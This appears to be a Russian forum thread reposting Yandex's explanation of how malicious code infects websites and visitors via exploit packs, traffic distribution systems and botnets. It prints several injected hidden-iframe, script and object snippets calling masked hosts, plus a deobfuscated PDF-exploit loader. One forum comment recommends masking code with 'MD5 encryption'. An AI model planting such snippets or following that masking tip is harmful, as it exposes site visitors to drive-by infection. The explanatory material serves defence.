Опасный элемент может появиться на сайте и без ведома его владельца. Проявления кода могут долгое время оставаться незамеченными. Выявить вредоносный элемент часто можно только при детальном изучении кода сайта. Яндекс проверяет сайты на наличие в них опасных элементов, используя технологии своего партнера - компании Sophos ®.

О том, как вредоносный код попадает на сайты и как его найти, можно прочитать в разделе "Помощь". Сразу после его удаления можно запросить перепроверку сайта. Однако, если на сайте был обнаружен такой код, необходимо не только удалить его, но и устранить проблему в системе безопасности сайта.

Группа пролетарского гнева компании Яндекс

[quote=alexsey9999]Обычно из-за не заскриптованных партнёрок такие вредоносные коды находит[/quote]

Так оно и есть... у меня из-зп попандер.ру

Примеры. Вредоносный код может добавлять к страницам такие конструкции:
<iframe src="http: //****-*******.net/?click=12078406" width=1 height=1 style="visibility:hidden;position:absolute"></iframe>
или
<script src=http: //www.****.ru/script.js></script>
или такой
<object data='http: //***.name/in.cgi?2 ' type='text/html' style='display:none'></object>
А баннерная система для взрослых может использовать такой код:
<script language="javascript">
var xxxwidth= 300;
var xxxheight= 100;
var xxxbgcolor= '';
var xxxcolor= 'blue';
var xxxsize= 16;
var xxxcount= 5;
</script>
<script language="javascript" src="http: //*****-*****.ru/load.php?id=330"></script>
Маскировка вредоносного кода это думаю всем понятно если нет то можете сами здлать маскировку такую как Шифрование в MD5 перейдя по ссылке http://seo-worldservice.ru/md5crypt.html

Часто авторы кода стараются затруднить его анализ и обнаружение, используя специальные техники, называемые обфускацией (от англ. obfuscation). Это может выглядеть так:

Заражение компьютера пользователя

Почему происходит заражение? Казалось бы, страница просто загружается браузером и отображается. Если бы в программах не было ошибок, то загрузка и отображение были бы всегда безопасными действиями. К сожалению, такие ошибки (уязвимости) есть, они и используются злоумышленниками. Хотя компании регулярно выпускают обновления для своих продуктов, злоумышленники постоянно исследуют их в поиске новых уязвимостей.

Вредоносный код на загружаемой пользователем странице, выполняясь, использует уязвимости приложений, что позволяет злоумышленникам получить полный контроль над атакуемым компьютером. Специально написанная для этого программа или скрипт называется эксплойт (от англ. exploit). Эксплойты для разных типов уязвимостей объединяют в наборы (exploit packs) для повышения вероятности заражения компьютера жертвы. Для атаки используются уязвимости как в самом браузере, так и в других приложениях и дополнениях (например, в плагинах для просмотра PDF и flash).

Как на этом зарабатывают

Очень часто код, внедренный в страницу сайта, перенаправляет пользователя на эксплойт или рекламный сайт не напрямую, а через специальный сервер злоумышленников, который называют Traffic Distribution System (TDS). Задача этой системы -- "перебрасывать" пользователей дальше и собирать статистику в зависимости от характеристик атакуемого компьютера. Например, TDS может анализировать версию используемого браузера и направлять пользователя на систему с вредоносным кодом, где есть эксплойт для его версии.

Если код эксплойта получил контроль над компьютером пользователя, то он выполняет загрузку и исполнение основной части вируса. Эта часть остается активной на компьютере жертвы и может выполнять множество вредоносных действий. Например, собирать имена и пароли для FTP и других установленных программ и отправлять их злоумышленникам. Или же использовать их для дальнейшего заражения сайтов. Или показывать пользователю рекламу, подменять результаты поисковых систем. Следить за действиями пользователя и "коллекционировать" учетные записи для популярных сайтов или online-банков. Часто различные зловредные модули могут объединяться, а компьютер включаться в сеть из инфицированных систем (бот-сеть), контролируемых злоумышленниками. Крупнейшие ботнеты в мире насчитывают миллионы "зомбированных" компьютеров. Продажа услуг такой сети -- еще одна статья дохода злоумышленников. Бот-сеть может использоваться для рассылки спама или организации DDoS-атак.

Пример

Рассмотрим код, который можно встретить в зараженной баннерной системе или на popunder-баннере. Казалось бы, "безобидный" код
<script language="javascript" src="http: //*****-*****.ru/load.php?id=330"></script>
кроме показа баннера вставляет на страницу и такой код
<iframe src="http: //************.com/tds/in.cgi?13" frameborder=0 width=0 height=0></iframe>
Если открыть эту страницу в Firefox 3.0.10, то после выполнения кода баннерной системы браузер пользователя автоматически перейдет по ссылке, указанной в IFRAME, а ссылка приведет на TDS злоумышленников. В ответ от TDS браузер получает автоматическое перенаправление на следующий сайт, где расположен эксплойт, учитывающий версию браузера. Он рассчитан на уязвимость в Adobe Acrobat Reader и приводится в действие обфусцированным кодом, который в расшифрованном виде выглядит так:
function pdf() { var my_div = document.createElement("div"); my_div.innerHTML = "<object data=\"http: //****.org/spl/pdf.php\" type=\"application/pdf\" width=100 height=100></object>"; document.body.appendChild(my_div); } pdf();
Послесловие
Задачи по борьбе с вирусами появились в Яндексе около года назад. Мы надеемся, что наш поиск, став более безопасным, снизит темпы распространения вредоносных программ в Рунете.

Группа пролетарского гнева компании Яндекс